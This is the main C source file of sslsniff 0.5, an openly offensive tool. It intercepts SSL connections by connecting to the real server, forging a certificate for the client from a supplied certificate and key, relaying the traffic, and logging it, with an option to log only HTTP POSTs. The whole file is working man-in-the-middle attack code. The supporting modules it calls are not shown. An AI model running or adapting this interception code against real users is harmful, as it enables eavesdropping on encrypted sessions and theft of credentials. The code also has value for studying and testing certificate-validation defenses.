/*-
 * Copyright (c) 2002, Mike Benham
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 4. Neither the name of this program nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <openssl/ssl.h>

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <sys/types.h>
#include <unistd.h>

#include "cache.h"
#include "network.h"
#include "mx509.h"
#include "mssl.h"
#include "log.h"
#include "sslsniff.h"

static char *logDirectory = ".";

static void printUsage(char *command) {
  fprintf(stderr, "Usage: %s [options]\n\nRequired Options:\n" 
	  "-c <file>\tFile containing valid certificate and private key\n"
	  "-p <port>\tPort to listen on\n"
	  "\nOptional Options:\n"
	  "-d\t\tDirectory to put log files (defaults to \".\")\n"
	  "-m\t\tSign certificates using MD5 (defaults to SHA-1)\n"
	  "-P\t\tOnly log HTTP POSTs\n\n", command);
  exit(1);
}

static void handleNewConnection(int client, Credentials *credentials) {
  int   server        = NETWORK_connectToServer(client);                             /* Connect to real server         */
  SSL  *serverSession = MSSL_handshakeWithServer(server);                            /* SSL Handshake with real server */
  X509 *spoofedCert   = MX509_buildCertificateForClient(serverSession, credentials); /* Build spoofed cert             */
  SSL  *clientSession = MSSL_handshakeWithClient(client, spoofedCert, credentials);  /* SSL Handshake with client      */
  Log  *log           = LOG_init(logDirectory, client, server, credentials->postOnly);
  
  MSSL_shuttleData(client, clientSession, server, serverSession, log);
  
  SSL_free(serverSession);
  SSL_free(clientSession);
  
  exit(0);
}

static void acceptConnections(int server, Credentials *credentials) {
  for (;;) {
    int client = NETWORK_acceptConnection(server);

    if (fork() == 0) handleNewConnection(client, credentials);
    else             close(client);
  }
}

static int parseArguments(int argc, char* argv[], char** certificateFile, int *listenPort, int *postOnly, int *useMD5) 
{
  int c;
  extern char *optarg;
  
  *postOnly        = 0;
  *certificateFile = NULL;
  *listenPort      = -1;
  *useMD5          = 0;

  while ((c = getopt(argc, argv, "mp:d:c:P")) != -1) {
    switch (c) {
    case 'd': logDirectory     = optarg;       break;
    case 'm': *useMD5          = 1;            break;
    case 'c': *certificateFile = optarg;       break;
    case 'p': *listenPort      = atoi(optarg); break;
    case 'P': *postOnly        = 1;            break;
    default:
      return -1;
    }
  }
  
  if ((*certificateFile) == NULL || (*listenPort) == -1) return -1;
  else                                                   return 1;
}

int main(int argc, char* argv[]) {
  int serverSocket, listenPort, postOnly, useMD5;
  char *certificateFile;
  Credentials credentials;

  if (parseArguments(argc, argv, &certificateFile, &listenPort, &postOnly, &useMD5) < 0) {
    printUsage(argv[0]);
  }

  SSL_library_init();
  SSL_load_error_strings();

  if ((credentials.middleCertificate = MX509_loadCertificateFromFile(certificateFile)) == NULL) {
    fprintf(stderr, "Couldn't read certificate from %s.\n", certificateFile);
    return 1;
  }

  if ((credentials.middleKey = MX509_loadKeyFromFile(certificateFile)) == NULL) {
    fprintf(stderr, "Couldn't read private key from %s.\n", certificateFile);
    return 1;
  }

  if ((serverSocket = NETWORK_listenOnPort(listenPort)) < 0) {
    fprintf(stderr, "Could not bind to port %d\n", listenPort);
    return 1;
  }

  credentials.leafKey  = MX509_buildKeysForClient();
  credentials.postOnly = postOnly;
  credentials.useMD5   = useMD5;
  
  CACHE_initialize();

  fprintf(stderr, "sslsniff 0.5 [%s] initialized and listening on %d...\n", 
	  (useMD5 ? "MD5 Mode" : "SHA1 Mode"), listenPort);

  acceptConnections(serverSocket, &credentials);

  return 1;
}
